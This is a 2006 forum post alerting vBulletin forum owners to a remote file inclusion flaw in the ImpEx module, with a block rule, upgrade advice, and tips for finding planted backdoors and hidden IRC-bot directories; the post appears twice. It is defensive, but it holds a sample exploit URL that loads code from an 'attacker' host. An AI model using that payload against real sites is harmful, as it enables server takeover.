GoFuckYourself.com - Adult Webmaster Forum - View Single Post - ALERT for all Forum owners running vBulletin.

SplitInfinity · 05-13-2006, 01:07 PM

SplitInfinity Here letting you know that....

There is a known Turkish hacker group targeting the adult industry.
The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

First, you should immediately block this class C:

ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all

For some reason, they keep using the same ips. Lame hackers. :-)

I have tracked them down and done some stuff to stop them from what they
are doing.... however you should be warned that if you run vBulletin they
will be hitting you soon! So far they have taken out over 10,000 sites
as reported on securityfocus.

Vulnerability Classification:

* Remote/Network Access Required
* Input Manipulation
* Loss Of Integrity
* Exploit Available
* Verified
* Web Related

Products:

* vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex )

Solution:

Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes:

http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt?

Where the hackers play...
http://www.sanalinfaz.com/forumm/sho...=6140#post6140

They will use the exploit to install mech, eggdrops, backdoors to your server and more. I list below some common places they plant their files....

Places to check:
/tmp
/var/tmp/
/var/tmp/ssh
/var/tmp/root
/var/tmp/

Look for a file simply named "a" it is a backdoor.
That list is NOT all inclusive as different groups will run different
root kits for the same exploit....

Look for hidden directories by hitting TAB.

Example:

ls -la
total 20
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58
drwxrwxrwt 3 root root 4096 May 13 13:20 .
drwxr-xr-x 24 root root 4096 Jan 29 20:50 ..

Notice the seemingly empty one on top?
If it type: cd [TAB]

I get this:
cd \ /multi/

They used control characters to hide the name of the directory. It
becomes exposed when tab completion has a go at it. They basically
named the directory " " space... :-)

So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit
they run is in there. :-)

total 1360
drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 .
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 ..
-rw-r--r-- 1 apache apache 454 Apr 24 07:08 `2Skeletzi.seen
-rw-r--r-- 1 apache apache 143 Apr 24 07:08 `50Cent.seen
-rw-r--r-- 1 apache apache 647 Apr 24 07:08 `50Centz.seen
-rw-r--r-- 1 apache apache 887 Apr 24 07:08 `5OCentz.seen
-rwxr-xr-x 1 apache apache 12 Dec 26 01:51 acycmech
-rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen
-rw-r--r-- 1 apache apache 527 Apr 24 07:08 Alexandreta.seen
-rw-r--r-- 1 apache apache 712 Apr 24 07:08 Al`Quaida.seen
-rw-r--r-- 1 apache apache 452 Apr 24 07:08 A-Tentat`.seen
-rw-r--r-- 1 apache apache 435 Apr 24 07:08 Aurora.seen
-rw-r--r-- 1 apache apache 234 Apr 24 07:08 BadBoy^.seen
-rw-r--r-- 1 apache apache 276 Apr 24 07:08 BaxDeCd`ie.seen
-rw-r--r-- 1 apache apache 941 Apr 24 07:08 B`Nicolita.seen
-rw-r--r-- 1 apache apache 878 Apr 24 07:08 Boxe.seen
-rw-r--r-- 1 apache apache 363 Apr 24 07:08 BUG`Mafia.seen
-rw-r--r-- 1 apache apache 842 Apr 24 07:08 C0Sty.seen
-rw-r--r-- 1 apache apache 620 Apr 24 07:08 CaracalCity.seen
-rw-r--r-- 1 apache apache 799 Apr 24 07:08 caracalmwe.seen
-rw-r--r-- 1 apache apache 339 Apr 24 07:08 CaracalTown.seen
-rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen
-rw-r--r-- 1 apache apache 692 Apr 24 07:08 CartierulHCC.seen
-rw-r--r-- 1 apache apache 581 Apr 24 07:08 CartziDeJoc.seen

Etc....
the list goes on

05-13-2006, 01:07 PM
SplitInfinity Confirmed User Join Date: Dec 2002 Location: San Diego, CA Posts: 3,047	ALERT for all Forum owners running vBulletin. SplitInfinity Here letting you know that.... There is a known Turkish hacker group targeting the adult industry. The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. First, you should immediately block this class C: ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all For some reason, they keep using the same ips. Lame hackers. :-) I have tracked them down and done some stuff to stop them from what they are doing.... however you should be warned that if you run vBulletin they will be hitting you soon! So far they have taken out over 10,000 sites as reported on securityfocus. Vulnerability Classification: * Remote/Network Access Required * Input Manipulation * Loss Of Integrity * Exploit Available * Verified * Web Related Products: * vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex ) Solution: Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Manual Testing Notes: http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt? Where the hackers play... http://www.sanalinfaz.com/forumm/sho...=6140#post6140 They will use the exploit to install mech, eggdrops, backdoors to your server and more. I list below some common places they plant their files.... Places to check: /tmp /var/tmp/ /var/tmp/ssh /var/tmp/root /var/tmp/ Look for a file simply named "a" it is a backdoor. That list is NOT all inclusive as different groups will run different root kits for the same exploit.... Look for hidden directories by hitting TAB. Example: ls -la total 20 drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 drwxrwxrwt 3 root root 4096 May 13 13:20 . drwxr-xr-x 24 root root 4096 Jan 29 20:50 .. Notice the seemingly empty one on top? If it type: cd [TAB] I get this: cd \ /multi/ They used control characters to hide the name of the directory. It becomes exposed when tab completion has a go at it. They basically named the directory " " space... :-) So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit they run is in there. :-) total 1360 drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 . drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 .. -rw-r--r-- 1 apache apache 454 Apr 24 07:08 `2Skeletzi.seen -rw-r--r-- 1 apache apache 143 Apr 24 07:08 `50Cent.seen -rw-r--r-- 1 apache apache 647 Apr 24 07:08 `50Centz.seen -rw-r--r-- 1 apache apache 887 Apr 24 07:08 `5OCentz.seen -rwxr-xr-x 1 apache apache 12 Dec 26 01:51 acycmech -rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen -rw-r--r-- 1 apache apache 527 Apr 24 07:08 Alexandreta.seen -rw-r--r-- 1 apache apache 712 Apr 24 07:08 Al`Quaida.seen -rw-r--r-- 1 apache apache 452 Apr 24 07:08 A-Tentat`.seen -rw-r--r-- 1 apache apache 435 Apr 24 07:08 Aurora.seen -rw-r--r-- 1 apache apache 234 Apr 24 07:08 BadBoy^.seen -rw-r--r-- 1 apache apache 276 Apr 24 07:08 BaxDeCd`ie.seen -rw-r--r-- 1 apache apache 941 Apr 24 07:08 B`Nicolita.seen -rw-r--r-- 1 apache apache 878 Apr 24 07:08 Boxe.seen -rw-r--r-- 1 apache apache 363 Apr 24 07:08 BUG`Mafia.seen -rw-r--r-- 1 apache apache 842 Apr 24 07:08 C0Sty.seen -rw-r--r-- 1 apache apache 620 Apr 24 07:08 CaracalCity.seen -rw-r--r-- 1 apache apache 799 Apr 24 07:08 caracalmwe.seen -rw-r--r-- 1 apache apache 339 Apr 24 07:08 CaracalTown.seen -rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen -rw-r--r-- 1 apache apache 692 Apr 24 07:08 CartierulHCC.seen -rw-r--r-- 1 apache apache 581 Apr 24 07:08 CartziDeJoc.seen Etc.... the list goes on